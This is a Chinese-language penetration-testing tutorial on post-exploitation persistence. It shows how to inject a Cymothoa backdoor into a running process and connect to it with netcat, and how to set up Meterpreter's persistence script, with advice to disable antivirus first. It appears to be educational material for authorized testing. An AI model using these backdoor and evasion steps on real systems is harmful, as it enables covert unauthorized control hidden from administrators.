在完成了權限提升之後,我們就應該建立後門(backdoor)了,以維持對目标主機的控制權,這樣一來,即使我們所利用的漏洞被更新檔程式修複,還可以通過後門繼續控制目标系統。
1.Cymothoa後門
Cymothoa是一款可以将ShellCode注入現有程序(即插程序)的後門工具。借助這種注入手段,,他能夠把shellcode僞裝成正常程式。他所注入的後門程式應當能夠與被注入的程式(程序)共存,以避免被管理人員和維護人員懷疑。将shellcode注入其他程序,還有另外一項優勢:即使目标系統的安全防護工具能夠監視可執行程式的完整性,隻要他不檢測記憶體,就發現不了(插程序)後門程式的程序。
該後門注入系統的某一程序,反彈的是該程序相應的權限(并不需要root)。當然,因為後門是運作中的程式為宿主,是以隻要程序關閉或者目标主機重新開機,後門就會停止運作。
首先可檢視程式的PID(在linux系統下輸入 ps -aux 指令,在windows系統下輸入 tasklist 指令)
在使用Cymothoa時,需通過-p選項指定目标程序的PID,并通過-s選項指定shellcode的編号,shellcode的編号。
在滲透目标主機後,就可以把Cymothoa的可執行程式複制到目标機上,生成後門程式。例如,這裡選擇PID為258的程序為宿主程序,選用第一類shellcode,指定Payload服務端口為3333,具體指令如下。
cymothoa -p 258 -s 1 -y 3333
成功後就可以通過以下指令連接配接目标主機的後門(3333端口)。
Nc -nvv 192.168.1.100 3333
2.Persistence後門
persistence是一款使用安裝自啟動方式的持久性後門程式,讀者可以利用他建立注冊和檔案。首先 run persistence -h檢視用得到的所有指令選項。
接着輸入以下指令建立一個持久性的後門。
- A :自動啟動payload程式
- S :系統啟動時自動加載
- U :使用者登陸時自動啟動
- X :開機時自動加載
- i :回連的時間間隔
- P:監聽反向連接配接端口号
- r :目标機器ip位址
後面也可以看到,Meterpreter會話在目标機器系統中建立起來了,現在輸入sessions指令檢視已經成功擷取的會話,可以看到目前有倆個連接配接。
注意:這個腳本需要在目标機器上建立檔案進而觸發防毒軟體,建議運作前關閉防毒軟體。